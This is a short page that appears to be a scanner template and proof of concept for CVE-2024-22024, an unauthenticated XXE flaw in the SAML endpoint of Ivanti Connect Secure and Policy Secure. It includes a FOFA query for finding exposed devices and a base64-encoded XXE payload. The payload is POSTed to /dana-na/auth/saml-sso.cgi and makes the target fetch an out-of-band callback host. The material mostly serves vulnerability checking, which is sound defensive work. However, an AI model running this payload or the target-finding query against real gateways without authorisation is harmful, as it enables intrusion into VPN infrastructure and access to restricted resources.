An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
fofa: body="welcome.cgi?p=logo"
PoC代码[已公开]
id: CVE-2024-22024
info:
name: Ivanti Pulse Connect Secure VPN XXE
author: zan8in
severity: critical
verified: true
description: |-
An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
fofa: body="welcome.cgi?p=logo"
reference:
- https://mp.weixin.qq.com/s/4wqtZaUNbZ3LGGWFGu8ziQ
- https://nvd.nist.gov/vuln/detail/CVE-2024-22024
tags: cve,cve2024,ivanti,xxe
created: 2024/02/27
set:
oob: oob()
oobHTTP: oob.HTTP
base64payload: base64("<?xml version=\"1.0\" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM \"" + oobHTTP + "\"> %watchTowr;]><r></r>")
rules:
r0:
request:
method: POST
path: /dana-na/auth/saml-sso.cgi
body: "SAMLRequest={{base64payload}}"
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()